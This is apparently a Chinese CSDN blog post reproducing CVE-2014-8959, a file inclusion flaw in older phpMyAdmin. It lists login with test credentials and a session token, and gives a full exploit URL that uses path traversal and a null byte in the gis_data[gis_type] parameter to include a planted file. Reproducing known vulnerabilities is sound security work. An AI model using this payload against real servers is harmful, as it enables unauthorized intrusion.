phpmyadmin-文件包含(CVE-2014-8959)

文章揭示了一个phpmyadmin中的文件包含漏洞,可通过二次编码绕过检查,允许用户包含根目录下的恶意文件。详细介绍了使用已知MySQL凭证登录、截断漏洞配合及构造URL来重现该漏洞的过程。
摘要由CSDN通过智能技术生成

漏洞描述:

其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞

1.已知MySQL用户名和密码登录到phpmyadmin

2.需要截断漏洞配合才能任意包含

3、包含根目录下1.gif等恶意文件

复现过程:

1.访问ip:port

2.访问登陆页面

/pma/gis_data_editor.php

用户名密码登陆pmatest/pmatest (phpMyAdmin)

3.进入以后 

记录token

4.构造URL,成功执行文件包含

http://ip:port/pma/gis_data_editor.php?token=a4fac8c22ed7b4ceef5f4357f4846d2d&&gis_data[gis_type]=/../../../../1.gif%00

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值